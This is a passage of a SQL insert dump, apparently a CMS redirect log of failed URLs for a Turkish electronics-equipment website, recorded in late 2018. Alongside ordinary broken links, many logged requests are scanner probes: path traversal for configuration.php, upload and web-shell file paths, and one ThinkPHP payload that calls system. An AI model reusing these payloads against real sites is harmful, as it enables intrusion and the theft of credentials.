00:00:00',301),(21447,'http://3s-technologies.com.tr/tr/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/','',1,0,'2018-11-23 03:50:06','0000-00-00 00:00:00',301),(21448,'http://3s-technologies.com.tr/en/wp-content/plugins/art-picture-shop/admin/file-upload/server/php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/','',1,0,'2018-11-23 06:42:53','0000-00-00 00:00:00',301),(21449,'http://www.3s-technologies.com.tr/xmlrpc.php',NULL,'','',8,0,'2018-11-24 00:26:50','0000-00-00 00:00:00',301),(21450,'http://www.3s-technologies.com.tr/blog/xmlrpc.php',NULL,'','',8,0,'2018-11-24 00:26:50','0000-00-00 00:00:00',301),(21451,'http://3s-technologies.com.tr/tr/wp-content/themes/sehf/server/php/',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/sehf/server/php/','',1,0,'2018-11-24 03:39:41','0000-00-00 00:00:00',301),(21452,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer',NULL,'','',24,0,'2018-11-24 05:40:23','0000-00-00 00:00:00',301),(21453,'http://3s-technologies.com.tr/en/wp-content/themes/sehf/server/php',NULL,'http://3s-technologies.com.tr/wp-content/themes/sehf/server/php/','',1,0,'2018-11-24 05:53:48','0000-00-00 00:00:00',301),(21454,'http://3s-technologies.com.tr/tr/user/login',NULL,'','',24,0,'2018-11-25 14:22:58','0000-00-00 00:00:00',301),(21455,'http://3s-technologies.com.tr/tr/wp-admin/install.php',NULL,'','',185,0,'2018-11-25 14:23:11','0000-00-00 00:00:00',301),(21456,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',5,0,'2018-11-25 14:23:20','0000-00-00 00:00:00',301),(21457,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/up.php',NULL,'','',2,0,'2018-11-25 14:23:24','0000-00-00 00:00:00',301),(21458,'http://3s-technologies.com.tr/tr/components/attari.php',NULL,'','',2,0,'2018-11-25 14:23:28','0000-00-00 00:00:00',301),(21459,'http://3s-technologies.com.tr/tr/?option=com_foxcontact&view=invalid',NULL,'','',1,0,'2018-11-25 14:23:43','0000-00-00 00:00:00',301),(21460,'http://3s-technologies.com.tr/tr/com_jbcatalog/libraries/jsupload/server/php/files/files/bb.jpg',NULL,'','',2,0,'2018-11-25 14:23:48','0000-00-00 00:00:00',301),(21461,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/up.php',NULL,'','',2,0,'2018-11-25 14:24:02','0000-00-00 00:00:00',301),(21462,'http://3s-technologies.com.tr/tr/?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',2,0,'2018-11-25 14:24:07','0000-00-00 00:00:00',301),(21463,'http://3s-technologies.com.tr/tr/?option=com_jetext&task=download&file=../../configuration.php',NULL,'','',2,0,'2018-11-25 14:24:18','0000-00-00 00:00:00',301),(21464,'http://3s-technologies.com.tr/tr/?option=com_addproperty&task=listing&propertyid=73&action=filedownload&fname=../configuration.php',NULL,'','',2,0,'2018-11-25 14:24:23','0000-00-00 00:00:00',301),(21465,'http://3s-technologies.com.tr/tr/modules/mod_dvfoldercontent/download.php?f=li4vli4vli4vli4vli4vli4vli4vdgfyz2v0l3d3dy9jb25mawd1cmf0aw9ulnboca==',NULL,'','',3,0,'2018-11-25 14:24:26','0000-00-00 00:00:00',301),(21466,'http://3s-technologies.com.tr/tr/plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php',NULL,'','',3,0,'2018-11-25 14:24:29','0000-00-00 00:00:00',301),(21467,'http://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/includes/download.php?file=./../.../configuration.php',NULL,'','',2,0,'2018-11-25 14:24:46','0000-00-00 00:00:00',301),(21468,'http://3s-technologies.com.tr/tr/?option=com_user&view=reset&layout=confirm',NULL,'','',1,0,'2018-11-25 14:24:51','0000-00-00 00:00:00',301),(21469,'http://3s-technologies.com.tr/tr/?option=com_users&view=archive',NULL,'','',1,0,'2018-11-25 14:25:04','0000-00-00 00:00:00',301),(21470,'http://3s-technologies.com.tr/tr/?option=com_installer&view=archive',NULL,'','',1,0,'2018-11-25 14:25:06','0000-00-00 00:00:00',301),(21471,'http://3s-technologies.com.tr/tr/admin.advancedpoll.php?mosconfig_live_site=',NULL,'','',2,0,'2018-11-25 14:25:07','0000-00-00 00:00:00',301),(21472,'http://3s-technologies.com.tr/tr/admin.akocomment.php?mosconfig_live_site=',NULL,'','',2,0,'2018-11-25 14:25:09','0000-00-00 00:00:00',301),(21473,'http://3s-technologies.com.tr/tr/lang.php?mosconfig_absolute_path=',NULL,'','',2,0,'2018-11-25 14:25:13','0000-00-00 00:00:00',301),(21474,'http://3s-technologies.com.tr//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',5,0,'2018-11-25 14:25:37','0000-00-00 00:00:00',301),(21475,'http://3s-technologies.com.tr//components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',2,0,'2018-11-25 14:25:41','0000-00-00 00:00:00',301),(21476,'http://3s-technologies.com.tr//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../attari.php',NULL,'','',1,0,'2018-11-25 14:25:44','0000-00-00 00:00:00',301),(21477,'http://3s-technologies.com.tr/tr/index.php?option=com_foxcontact&view=invalid',NULL,'','',1,0,'2018-11-25 14:25:59','0000-00-00 00:00:00',301),(21478,'http://3s-technologies.com.tr//components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',1,0,'2018-11-25 14:26:00','0000-00-00 00:00:00',301),(21479,'http://3s-technologies.com.tr//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-11-25 14:26:07','0000-00-00 00:00:00',301),(21480,'http://3s-technologies.com.tr/tr/index.php?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',1,0,'2018-11-25 14:26:11','0000-00-00 00:00:00',301),(21481,'http://3s-technologies.com.tr/tr/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&itemid=1',NULL,'','',1,0,'2018-11-25 14:26:15','0000-00-00 00:00:00',301),(21482,'http://3s-technologies.com.tr/tr/index.php?option=com_jetext&task=download&file=../../configuration.php',NULL,'','',1,0,'2018-11-25 14:26:17','0000-00-00 00:00:00',301),(21483,'http://3s-technologies.com.tr/tr/index.php?option=com_addproperty&task=listing&propertyid=73&action=filedownload&fname=../configuration.php',NULL,'','',1,0,'2018-11-25 14:26:20','0000-00-00 00:00:00',301),(21484,'http://3s-technologies.com.tr/tr/index.php?option=com_facegallery&task=imagedownload&img_name=../../configuration.php',NULL,'','',1,0,'2018-11-25 14:26:25','0000-00-00 00:00:00',301),(21485,'http://3s-technologies.com.tr/tr/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php',NULL,'','',1,0,'2018-11-25 14:26:29','0000-00-00 00:00:00',301),(21486,'http://3s-technologies.com.tr/tr/index.php?option=com_user&view=reset&layout=confirm',NULL,'','',1,0,'2018-11-25 14:26:40','0000-00-00 00:00:00',301),(21487,'http://3s-technologies.com.tr/tr/index.php?option=com_users&view=archive',NULL,'','',1,0,'2018-11-25 14:26:47','0000-00-00 00:00:00',301),(21488,'http://3s-technologies.com.tr/tr/index.php?option=com_installer&view=archive',NULL,'','',1,0,'2018-11-25 14:26:49','0000-00-00 00:00:00',301),(21489,'http://www.3s-technologies.com.tr/en/wp-content/themes/multimedia1/server/php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/multimedia1/server/php/','',3,0,'2018-11-26 13:37:01','0000-00-00 00:00:00',301),(21490,'http://3s-technologies.com.tr/tr/?r?nler/temizleme-makineleri',NULL,'','',4,0,'2018-11-26 20:43:18','0000-00-00 00:00:00',301),(21491,'http://3s-technologies.com.tr/tr/?r?nler/screen-printer',NULL,'','',4,0,'2018-11-26 21:40:16','0000-00-00 00:00:00',301),(21492,'http://3s-technologies.com.tr/tr/?r?nler/smd-d?s?k-hizli',NULL,'','',4,0,'2018-11-27 00:53:35','0000-00-00 00:00:00',301),(21493,'http://3s-technologies.com.tr/tr/?r?nler/manufacturers/panasonic',NULL,'','',4,0,'2018-11-27 18:26:40','0000-00-00 00:00:00',301),(21494,'http://www.3s-technologies.com.tr/en/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js','',3,0,'2018-11-29 01:58:36','0000-00-00 00:00:00',301),(21495,'http://3s-technologies.com.tr/tr/cqigeniu.html',NULL,'','',1,0,'2018-11-30 10:21:41','0000-00-00 00:00:00',301),(21496,'http://www.3s-technologies.com.tr/en/image-gallery?format=feed&type=rss',NULL,'','',3,0,'2018-11-30 15:15:19','0000-00-00 00:00:00',301),(21497,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc/results,6-55',NULL,'','',2,0,'2018-11-30 21:36:19','0000-00-00 00:00:00',301),(21498,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-25',NULL,'','',3,0,'2018-11-30 21:36:47','0000-00-00 00:00:00',301),(21499,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-15',NULL,'','',5,0,'2018-11-30 21:37:40','0000-00-00 00:00:00',301),(21500,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-10',NULL,'','',2,0,'2018-11-30 21:38:25','0000-00-00 00:00:00',301),(21501,'http://www.3s-technologies.com.tr/tr/components/com_jdownloads/jdownloads.js',NULL,'','',1,0,'2018-12-01 15:48:14','0000-00-00 00:00:00',301),(21502,'http://3s-technologies.com.tr/tr/components/com_jdownloads/jdownloads.js',NULL,'','',3,0,'2018-12-02 02:06:22','0000-00-00 00:00:00',301),(21503,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name',NULL,'','',18,0,'2018-12-03 10:27:03','0000-00-00 00:00:00',301),(21504,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/dirdesc',NULL,'','',3,0,'2018-12-03 10:27:15','0000-00-00 00:00:00',301),(21505,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',5,0,'2018-12-03 10:27:30','0000-00-00 00:00:00',301),(21506,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/jvk-detail',NULL,'','',4,0,'2018-12-03 10:27:55','0000-00-00 00:00:00',301),(21507,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/mod_simplefileupload.css',NULL,'','',1,0,'2018-12-03 13:57:11','0000-00-00 00:00:00',301),(21508,'http://3s-technologies.com.tr/tr/.well-known/autoconfig/mail/config-v1.1.xml',NULL,'','',10,0,'2018-12-04 01:56:22','0000-00-00 00:00:00',301),(21509,'http://www.3s-technologies.com.tr/en/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',3,0,'2018-12-05 03:56:47','0000-00-00 00:00:00',301),(21510,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±',NULL,'','',13,0,'2018-12-05 04:05:20','0000-00-00 00:00:00',301),(21511,'http://www.3s-technologies.com.tr/en/wp-content/themes/gtr/ui/jqup/server/php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/gtr/ui/jqup/server/php/','',1,0,'2018-12-05 04:44:50','0000-00-00 00:00:00',301),(21512,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/yo.gif',NULL,'','',1,0,'2018-12-06 07:06:58','0000-00-00 00:00:00',301),(21513,'http://3s-technologies.com.tr/tr/sites/all/libraries/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/plupload/examples/upload.php','',16,0,'2018-12-06 10:11:01','0000-00-00 00:00:00',301),(21514,'http://3s-technologies.com.tr/en/sites/all/libraries/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/sites/all/libraries/plupload/examples/upload.php','',2,0,'2018-12-06 13:07:01','0000-00-00 00:00:00',301),(21515,'http://3s-technologies.com.tr/tr//tr/',NULL,'','',24,0,'2018-12-06 16:19:16','0000-00-00 00:00:00',301),(21516,'http://3s-technologies.com.tr/tr/foxcunyl.html',NULL,'','',1,0,'2018-12-07 20:27:54','0000-00-00 00:00:00',301),(21517,'http://3s-technologies.com.tr/tr/?r?nler/manufacturers/ddm-novastar',NULL,'','',4,0,'2018-12-08 03:09:17','0000-00-00 00:00:00',301),(21518,'http://3s-technologies.com.tr/tr/modules/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/tr/modules/plupload/examples/upload.php','',1,0,'2018-12-08 04:32:43','0000-00-00 00:00:00',301),(21519,'http://3s-technologies.com.tr/tr/sites/default/libraries/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/tr/sites/default/libraries/plupload/examples/upload.php','',1,0,'2018-12-08 04:32:43','0000-00-00 00:00:00',301),(21520,'http://3s-technologies.com.tr/tr/sites/all/libraries/_plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/_plupload/examples/upload.php','',1,0,'2018-12-08 04:32:43','0000-00-00 00:00:00',301),(21521,'http://3s-technologies.com.tr/tr/sites/all/modules/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/tr/sites/all/modules/plupload/examples/upload.php','',1,0,'2018-12-08 04:32:43','0000-00-00 00:00:00',301),(21522,'http://3s-technologies.com.tr/en/modules/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/modules/plupload/examples/upload.php','',1,0,'2018-12-08 07:57:50','0000-00-00 00:00:00',301),(21523,'http://3s-technologies.com.tr/en/sites/default/libraries/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/sites/default/libraries/plupload/examples/upload.php','',1,0,'2018-12-08 07:57:51','0000-00-00 00:00:00',301),(21524,'http://3s-technologies.com.tr/en/sites/all/modules/plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/sites/all/modules/plupload/examples/upload.php','',1,0,'2018-12-08 07:58:12','0000-00-00 00:00:00',301),(21525,'http://3s-technologies.com.tr/en/sites/all/libraries/_plupload/examples/upload.php',NULL,'http://3s-technologies.com.tr/sites/all/libraries/_plupload/examples/upload.php','',1,0,'2018-12-08 07:58:12','0000-00-00 00:00:00',301),(21526,'http://www.3s-technologies.com.tr/tr/urunler/user',NULL,'http://www.3s-technologies.com.tr/tr/urunler/user','',24,0,'2018-12-09 00:56:40','0000-00-00 00:00:00',301),(21527,'http://3s-technologies.com.tr/showthread.php',NULL,'','',7,0,'2018-12-09 03:06:21','0000-00-00 00:00:00',301),(21528,'http://3s-technologies.com.tr/images/banners/banner.php',NULL,'','',7,0,'2018-12-09 03:06:21','0000-00-00 00:00:00',301),(21529,'http://3s-technologies.com.tr/.config.php',NULL,'','',7,0,'2018-12-09 03:06:21','0000-00-00 00:00:00',301),(21530,'http://3s-technologies.com.tr/.cpanel_config.php',NULL,'','',7,0,'2018-12-09 03:06:22','0000-00-00 00:00:00',301),(21531,'http://3s-technologies.com.tr/.joomla.system.php',NULL,'','',7,0,'2018-12-09 03:06:22','0000-00-00 00:00:00',301),(21532,'http://3s-technologies.com.tr/images/.jindex.php',NULL,'','',7,0,'2018-12-09 03:06:22','0000-00-00 00:00:00',301),(21533,'http://3s-technologies.com.tr/tmp/.jindex.php',NULL,'','',7,0,'2018-12-09 03:06:22','0000-00-00 00:00:00',301),(21534,'http://3s-technologies.com.tr/cache/joomlacache.php',NULL,'','',8,0,'2018-12-09 03:06:23','0000-00-00 00:00:00',301),(21535,'http://3s-technologies.com.tr/ckeditor/post.php',NULL,'','',7,0,'2018-12-09 03:06:23','0000-00-00 00:00:00',301),(21536,'http://3s-technologies.com.tr/components/a.php',NULL,'','',7,0,'2018-12-09 03:06:23','0000-00-00 00:00:00',301),(21537,'http://3s-technologies.com.tr/includes/litecache.php',NULL,'','',8,0,'2018-12-09 03:06:23','0000-00-00 00:00:00',301),(21538,'http://3s-technologies.com.tr/modules/modules/joomla-resize.php',NULL,'','',7,0,'2018-12-09 03:06:23','0000-00-00 00:00:00',301),(21539,'http://3s-technologies.com.tr/modules/modules/modules.php',NULL,'','',7,0,'2018-12-09 03:06:24','0000-00-00 00:00:00',301),(21540,'http://3s-technologies.com.tr/modules/modules/path.php',NULL,'','',7,0,'2018-12-09 03:06:24','0000-00-00 00:00:00',301),(21541,'http://3s-technologies.com.tr/plugins/.joomla.system.php',NULL,'','',7,0,'2018-12-09 03:06:24','0000-00-00 00:00:00',301),(21542,'http://3s-technologies.com.tr/tmp/hello.php',NULL,'','',7,0,'2018-12-09 03:06:24','0000-00-00 00:00:00',301),(21543,'http://3s-technologies.com.tr/tmp/xmlrpc.php',NULL,'','',7,0,'2018-12-09 03:06:24','0000-00-00 00:00:00',301),(21544,'http://3s-technologies.com.tr/1.php',NULL,'','',7,0,'2018-12-09 03:06:25','0000-00-00 00:00:00',301),(21545,'http://3s-technologies.com.tr/admin.php',NULL,'','',7,0,'2018-12-09 03:06:25','0000-00-00 00:00:00',301),(21546,'http://3s-technologies.com.tr/cache/gadeyuvz.php',NULL,'','',7,0,'2018-12-09 03:06:25','0000-00-00 00:00:00',301),(21547,'http://3s-technologies.com.tr/cache/qlxlykva.php',NULL,'','',7,0,'2018-12-09 03:06:25','0000-00-00 00:00:00',301),(21548,'http://3s-technologies.com.tr/aqchmesl.php',NULL,'','',7,0,'2018-12-09 03:06:26','0000-00-00 00:00:00',301),(21549,'http://3s-technologies.com.tr/code.php',NULL,'','',7,0,'2018-12-09 03:06:26','0000-00-00 00:00:00',301),(21550,'http://3s-technologies.com.tr/conns.php',NULL,'','',7,0,'2018-12-09 03:06:26','0000-00-00 00:00:00',301),(21551,'http://3s-technologies.com.tr/db.php',NULL,'','',7,0,'2018-12-09 03:06:26','0000-00-00 00:00:00',301),(21552,'http://3s-technologies.com.tr/dir.php',NULL,'','',7,0,'2018-12-09 03:06:27','0000-00-00 00:00:00',301),(21553,'http://3s-technologies.com.tr/administrator/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:27','0000-00-00 00:00:00',301),(21554,'http://3s-technologies.com.tr/cache/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:27','0000-00-00 00:00:00',301),(21555,'http://3s-technologies.com.tr/components/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:27','0000-00-00 00:00:00',301),(21556,'http://3s-technologies.com.tr/includes/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:27','0000-00-00 00:00:00',301),(21557,'http://3s-technologies.com.tr/language/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:28','0000-00-00 00:00:00',301),(21558,'http://3s-technologies.com.tr/libraries/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:28','0000-00-00 00:00:00',301),(21559,'http://3s-technologies.com.tr/media/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:28','0000-00-00 00:00:00',301),(21560,'http://3s-technologies.com.tr/modules/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:28','0000-00-00 00:00:00',301),(21561,'http://3s-technologies.com.tr/templates/wp-up.php',NULL,'','',2,0,'2018-12-09 03:06:28','0000-00-00 00:00:00',301),(21562,'http://3s-technologies.com.tr/seo_script.php',NULL,'','',14,0,'2018-12-09 03:06:29','0000-00-00 00:00:00',301),(21563,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/index.html',NULL,'','',1,0,'2018-12-10 00:52:23','0000-00-00 00:00:00',301),(21564,'http://3s-technologies.com.tr/en/seo_script.php',NULL,'3s-technologies.com.tr','',1,0,'2018-12-10 11:14:03','0000-00-00 00:00:00',301),(21565,'http://3s-technologies.com.tr/en/components/com_banners/metadata.php',NULL,'3s-technologies.com.tr','',2,0,'2018-12-10 11:44:08','0000-00-00 00:00:00',301),(21566,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-12-10 14:07:52','0000-00-00 00:00:00',301),(21567,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-10',NULL,'','',2,0,'2018-12-10 14:07:59','0000-00-00 00:00:00',301),(21568,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-12-10 14:08:08','0000-00-00 00:00:00',301),(21569,'http://3s-technologies.com.tr/tr/components/com_expose/expose.php',NULL,'','',1,0,'2018-12-11 02:26:34','0000-00-00 00:00:00',301),(21570,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-homepage-slideshow/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-homepage-slideshow/readme.txt','',4,0,'2018-12-11 02:34:46','0000-00-00 00:00:00',301),(21571,'http://3s-technologies.com.tr/en/.cpanel_config.php',NULL,'3s-technologies.com.tr','',1,0,'2018-12-11 10:33:09','0000-00-00 00:00:00',301),(21572,'http://3s-technologies.com.tr/en/.config.php',NULL,'3s-technologies.com.tr','',1,0,'2018-12-11 10:33:09','0000-00-00 00:00:00',301),(21573,'http://3s-technologies.com.tr/tr/?r?nler/smd-firin',NULL,'','',4,0,'2018-12-11 19:31:07','0000-00-00 00:00:00',301),(21574,'http://www.3s-technologies.com.tr/en/wp-content/plugins/php-event-calendar/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/php-event-calendar/readme.txt','',3,0,'2018-12-12 03:46:14','0000-00-00 00:00:00',301),(21575,'http://3s-technologies.com.tr/en/templates/beez5/favicon.ico',NULL,'','',1,0,'2018-12-12 13:59:45','0000-00-00 00:00:00',301),(21576,'http://3s-technologies.com.tr/en/admin//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-13 02:13:16','0000-00-00 00:00:00',301),(21577,'http://3s-technologies.com.tr/en/cgi-bin/awstats//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-13 02:13:17','0000-00-00 00:00:00',301),(21578,'http://3s-technologies.com.tr/en/admin_area/charts/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-13 02:13:20','0000-00-00 00:00:00',301),(21579,'http://3s-technologies.com.tr/en/administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-12-13 02:13:20','0000-00-00 00:00:00',301),(21580,'http://3s-technologies.com.tr/wp-ajax-hook.php',NULL,'','',4,0,'2018-12-13 10:21:58','0000-00-00 00:00:00',301),(21581,'http://3s-technologies.com.tr/en/templates/system/css/system.css',NULL,'','',1,0,'2018-12-13 11:30:35','0000-00-00 00:00:00',301),(21582,'http://3s-technologies.com.tr/en/media/system/js/mootools-more.js',NULL,'','',2,0,'2018-12-13 11:30:35','0000-00-00 00:00:00',301),(21583,'http://3s-technologies.com.tr/en/language/en-gb/en-gb.ini',NULL,'','',1,0,'2018-12-13 11:30:35','0000-00-00 00:00:00',301),(21584,'http://3s-technologies.com.tr/en/language/en-gb/en-gb.xml',NULL,'','',1,0,'2018-12-13 11:30:36','0000-00-00 00:00:00',301),(21585,'http://3s-technologies.com.tr/en/media/plg_quickicon_extensionupdate/js/extensionupdatecheck.js',NULL,'','',1,0,'2018-12-13 11:30:36','0000-00-00 00:00:00',301),(21586,'http://3s-technologies.com.tr/en/components/com_tags/views/tag/metadata.xml',NULL,'','',1,0,'2018-12-13 11:30:36','0000-00-00 00:00:00',301),(21587,'http://3s-technologies.com.tr/en/components/com_config/model/form/templates.xml',NULL,'','',1,0,'2018-12-13 11:30:37','0000-00-00 00:00:00',301),(21588,'http://3s-technologies.com.tr/en/plugins/search/tags/tags.xml',NULL,'','',1,0,'2018-12-13 11:30:37','0000-00-00 00:00:00',301),(21589,'http://3s-technologies.com.tr/en/media/system/js/mootools.js',NULL,'','',1,0,'2018-12-13 11:30:37','0000-00-00 00:00:00',301),(21590,'http://www.3s-technologies.com.tr/tr/urzobdhgdeo.html',NULL,'','',1,0,'2018-12-13 19:35:31','0000-00-00 00:00:00',301),(21591,'http://3s-technologies.com.tr/tr/?r?nler/lehimleme-malzemeleri/krem-lehim',NULL,'','',4,0,'2018-12-14 03:25:33','0000-00-00 00:00:00',301),(21592,'http://3s-technologies.com.tr/cod.php',NULL,'','',6,0,'2018-12-14 12:52:25','0000-00-00 00:00:00',301),(21593,'http://www.3s-technologies.com.tr/tr/connectors/system/phpthumb.php',NULL,'','',2,0,'2018-12-14 14:31:22','0000-00-00 00:00:00',301),(21594,'http://3s-technologies.com.tr/wp-loadsnew.php',NULL,'','',3,0,'2018-12-14 16:30:14','0000-00-00 00:00:00',301),(21595,'http://3s-technologies.com.tr/tr/connectors/system/phpthumb.php',NULL,'','',4,0,'2018-12-14 22:58:37','0000-00-00 00:00:00',301),(21596,'http://3s-technologies.com.tr/wp-load-5b7a23c0744615b7a23c0744af.php',NULL,'','',5,0,'2018-12-15 01:13:47','0000-00-00 00:00:00',301),(21597,'http://3s-technologies.com.tr/tr/bcfgcuiptsrzdh.html',NULL,'','',1,0,'2018-12-15 19:17:16','0000-00-00 00:00:00',301),(21598,'http://3s-technologies.com.tr/bitrix/modules/main/include/prolog.php',NULL,'','',2,0,'2018-12-16 00:40:31','0000-00-00 00:00:00',301),(21599,'http://www.3s-technologies.com.tr/tr/&q=&res_url=http:/www.firmasec.com/firma/bkrrbc-miraysan-elektrik',NULL,'','',6,0,'2018-12-16 05:33:51','0000-00-00 00:00:00',301),(21600,'http://3s-technologies.com.tr/en/newsleter.php',NULL,'3s-technologies.com.tr','',2,0,'2018-12-17 17:52:13','0000-00-00 00:00:00',301),(21601,'http://www.3s-technologies.com.tr/en/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/registration-form','',20,0,'2018-12-18 18:47:20','0000-00-00 00:00:00',301),(21602,'http://3s-technologies.com.tr/cache/seo_script.php',NULL,'','',4,0,'2018-12-19 11:08:40','0000-00-00 00:00:00',301),(21603,'http://3s-technologies.com.tr/wp-main.php',NULL,'','',5,0,'2018-12-19 18:58:52','0000-00-00 00:00:00',301),(21604,'http://3s-technologies.com.tr/system/storage/logs/seo_script.php',NULL,'','',4,0,'2018-12-19 22:24:59','0000-00-00 00:00:00',301),(21605,'http://3s-technologies.com.tr/customizer.php',NULL,'','',4,0,'2018-12-20 09:56:00','0000-00-00 00:00:00',301),(21606,'http://3s-technologies.com.tr/en/images/.jindex.php',NULL,'3s-technologies.com.tr','',1,0,'2018-12-20 12:07:29','0000-00-00 00:00:00',301),(21607,'http://3s-technologies.com.tr/system/logs/seo_script.php',NULL,'','',4,0,'2018-12-20 13:14:25','0000-00-00 00:00:00',301),(21608,'http://www.3s-technologies.com.tr/tr/acxdzcklepuarne.html',NULL,'','',1,0,'2018-12-20 19:41:48','0000-00-00 00:00:00',301),(21609,'http://3s-technologies.com.tr/tr/components/com_myblog/defines.myblog.php',NULL,'','',2,0,'2018-12-21 05:57:06','0000-00-00 00:00:00',301),(21610,'http://3s-technologies.com.tr/images/defau1t.php',NULL,'','',5,0,'2018-12-21 20:41:49','0000-00-00 00:00:00',301),(21611,'http://3s-technologies.com.tr/images/xxx.php',NULL,'','',4,0,'2018-12-21 21:15:31','0000-00-00 00:00:00',301),(21612,'http://3s-technologies.com.tr/st.php',NULL,'','',4,0,'2018-12-22 04:55:07','0000-00-00 00:00:00',301),(21613,'http://3s-technologies.com.tr/tr/mukukzdn.html',NULL,'','',1,0,'2018-12-22 19:25:33','0000-00-00 00:00:00',301),(21614,'http://3s-technologies.com.tr/tr/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r \'phpinfo();\'',NULL,'','',1,0,'2018-12-23 20:28:00','0000-00-00 00:00:00',301),(21615,'http://3s-technologies.com.tr/tr/wp/wp-admin/install.php',NULL,'','',5,0,'2018-12-23 23:17:14','0000-00-00 00:00:00',301),(21616,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/install.php',NULL,'','',7,0,'2018-12-23 23:17:17','0000-00-00 00:00:00',301),(21617,'http://3s-technologies.com.tr/tr/blog/wp-admin/install.php',NULL,'','',3,0,'2018-12-23 23:17:21','0000-00-00 00:00:00',301),(21618,'http://3s-technologies.com.tr/tr/old/wp-admin/install.php',NULL,'','',3,0,'2018-12-23 23:17:24','0000-00-00 00:00:00',301),(21619,'http://3s-technologies.com.tr/tr/new/wp-admin/install.php',NULL,'','',3,0,'2018-12-23 23:17:27','0000-00-00 00:00:00',301),(21620,'http://3s-technologies.com.tr/tr/oldsite/wp-admin/install.php',NULL,'','',3,0,'2018-12-23 23:17:31','0000-00-00 00:00:00',301),(21621,'http://3s-technologies.com.tr/tr/components/com_hdflvplayer/controller.php',NULL,'','',2,0,'2018-12-24 05:35:47','0000-00-00 00:00:00',301),(21622,'http://3s-technologies.com.tr:80/tr/phpmyadmin',NULL,'http://3s-technologies.com.tr:80/phpmyadmin/','',2,0,'2018-12-24 